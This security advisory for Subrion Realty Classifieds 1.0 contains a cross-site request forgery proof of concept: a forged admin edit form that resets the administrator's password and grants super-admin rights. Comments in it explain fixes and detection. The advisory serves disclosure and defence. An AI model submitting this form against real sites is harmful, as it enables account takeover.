< ------------------- header data start ------------------- >
#############################################################
# Application Name :Subrion Realty Classifieds
# Version : 1.0
# Vulnerability Type : XSRF (cross-site request forgery)
# Impact : Admin account details can be changed remotely and automatically.
# Bug Fix Advice : A session-bound key (CSRF token) should be added to the form, and the current password should be required.
# author : BUG RESEARCHERS//CWH1RLPOOL
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
<!--
  Proof-of-concept from the advisory: a stand-alone copy of the admin edit form
  (admins_manage.php, action=edit).  When a logged-in administrator's browser
  submits it, the admin session cookie is attached automatically, which is what
  makes a cross-site request forgery possible.
  Mitigation, as the advisory recommends: an unpredictable, per-session token that
  the server validates on every state-changing request, and re-entry of the
  current password before credentials are changed.  SameSite cookies on the admin
  session and an Origin/Referer check are complementary defences.
  Detection: log admin password/permission changes with actor, source address
  and Origin/Referer; a change whose Origin is not the application's own host is
  a strong indicator of this attack class.
  The curly apostrophes and unquoted attribute values look like an artefact of
  how the advisory was published, not the application's original markup.
-->
<form action=http://realty.subrion.com/admin/admins_manage.php?id=1&action=edit method=post>
<input type=hidden name=prevent_csrf value=7436541f3a /><table cellspacing=0 cellpadding=0 width=100% class=striped>
<!-- prevent_csrf: the value is a fixed literal baked into the page.  For the PoC to
     work this value presumably is static or reusable across sessions; verify against
     the application.  An effective token is unpredictable, bound to the session and
     checked server-side. -->
<tr>
<td class=caption colspan=2><strong>General Information</strong></td>
</tr>
<tr>
<td width=200><strong>username:</strong></td>
<td><input type=text name=username size=22 value=admin/></td>
</tr>
<tr>
<td><strong>Full Name:</strong></td>
<td><input type=text name=fullname size=22 value=Administrator/></td>
</tr>
<tr>
<td><strong>Email:</strong></td>
<!-- the email value below appears to have been redacted by the publishing site -->
<td><input type=text name=email size=22 value=[email protected] /></td>
</tr>
<!-- No field asks for the current password, so a forged request can set a new one;
     requiring the current password here is the second fix the advisory recommends. -->
<tr>
<td><strong>password:</strong></td>
<td><input type=password name=new_pass size=22 /></td>
</tr>
<tr>
<td><strong>password Confirmation:</strong></td>
<td><input type=password name=new_pass2 size=22 /></td>
</tr>
<tr>
<td><strong>Status:</strong></td>
<td><select name=status>
<option value=approval >Approval</option>
<option value=active selected=selected>Active</option>
</select></td>
</tr>
<tr>
<td class=caption colspan=2><strong>Admin Permissions</strong></td>
</tr>
<!-- The same request also sets the super-admin flag (super=1) and the permissions[]
     list below; privilege changes need the same token and re-authentication
     protection as credential changes. -->
<tr>
<td><strong>Super Admin:</strong></td>
<td><input type=radio name=super value=1 id=type1 checked=checked onclick=javascript:$(’#permissions’).fadeOut(); /><label for=type1>Enabled</label>
<input type=radio name=super value=0 id=type0 onclick=javascript:$(’#permissions’).fadeIn();/><label for=type0>Disabled</label>
</td>
</tr>
</table>
<div id=permissions style=display: none;>
<fieldset class=collapsible style=margin-left: 20px;><legend>Common</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Common’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=admin_home id=tsadmin_home /><label for=tsadmin_home>Admin Panel</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=configuration id=tsconfiguration /><label for=tsconfiguration>Configuration</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=admins_manage id=tsadmins_manage /><label for=tsadmins_manage>Manage Admins</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=pages_manage id=tspages_manage /><label for=tspages_manage>Manage Pages</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=plugins_manage id=tsplugins_manage /><label for=tsplugins_manage>Manage Plugins</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=packages_manage id=tspackages_manage /><label for=tspackages_manage>Manage Packages</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=database_manage id=tsdatabase_manage /><label for=tsdatabase_manage>Manage Database</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=menus_manage id=tsmenus_manage /><label for=tsmenus_manage>Manage Menus</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=language_manage id=tslanguage_manage /><label for=tslanguage_manage>Language Manager</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=blocks_manage id=tsblocks_manage /><label for=tsblocks_manage>Manage Blocks</label></li><li style=float: left; width: 150px;><input type=checkbox 
class=group_Common name=permissions[] value=visual_manage id=tsvisual_manage /><label for=tsvisual_manage>Visual Manage</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=transactions_manage id=tstransactions_manage /><label for=tstransactions_manage>Manage Transactions</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Common name=permissions[] value=plans_manage id=tsplans_manage /><label for=tsplans_manage>Manage Plans</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Accounts</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Accounts’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_manage id=tsaccounts_fields_manage /><label for=tsaccounts_fields_manage>Accounts Fields</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_fields_groups_manage id=tsaccounts_fields_groups_manage /><label for=tsaccounts_fields_groups_manage>Accounts FieldGroups</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_manage id=tsaccounts_manage /><label for=tsaccounts_manage>Manage Accounts</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_search id=tsaccounts_search /><label for=tsaccounts_search>Search account</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Accounts name=permissions[] value=accounts_add id=tsaccounts_add /><label for=tsaccounts_add>Add account</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Realty</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Realty’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estates_manage id=tsestates_manage /><label for=tsestates_manage>Manage Estates</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estate_submit id=tsestate_submit /><label for=tsestate_submit>Sell Realty</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Realty name=permissions[] value=estates_fields_manage id=tsestates_fields_manage /><label for=tsestates_fields_manage>Estates Fields</label></li></fieldset><fieldset class=collapsible style=margin-left: 20px;><legend>Other</legend><input type=checkbox onclick=var hsrc = this; $(’input.group_Other’).each(function() {
if($(this).attr(’checked’) && !$(hsrc).attr(’checked’))
{
$(this).removeAttr(’checked’);
}
else
{
$(this).attr(’checked’, ’checked’);
}
});><i>select All </i><br />
<ul style=list-style-type:none><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=admin_help id=tsadmin_help /><label for=tsadmin_help>Help</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=rating id=tsrating /><label for=tsrating>Rating</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=comments id=tscomments /><label for=tscomments>Comments</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=album id=tsalbum /><label for=tsalbum>Picture Gallery</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=banner_manage id=tsbanner_manage /><label for=tsbanner_manage>Banners</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=rss_manage id=tsrss_manage /><label for=tsrss_manage>RSS Manager</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=news_manage id=tsnews_manage /><label for=tsnews_manage>Manage News</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=testimonials id=tstestimonials /><label for=tstestimonials>Testimonials</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=contact_us id=tscontact_us /><label for=tscontact_us>Contact Us</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=polls_manage id=tspolls_manage /><label for=tspolls_manage>Manage Polls</label></li><li style=float: left; width: 150px;><input type=checkbox class=group_Other name=permissions[] value=event id=tsevent /><label for=tsevent>Events</label></li><li style=float: left; width: 150px;><input 
type=checkbox class=group_Other name=permissions[] value=faq_manage id=tsfaq_manage /><label for=tsfaq_manage>Manage FAQ</label></li></fieldset><div style=clear:both;></div>
</div>
<table cellspacing=0 width=100%>
<tr class=all>
<!-- id and action are repeated as hidden fields, mirroring the query string, so the
     POST body alone identifies the target record and operation. -->
<td colspan=2><input type=submit class=button name=save value=Save Changes />
<input type=hidden name=id value=1 />
<input type=hidden name=action value=edit />
</td>
</tr>
</table>
</form>
< -- bug code end of -- >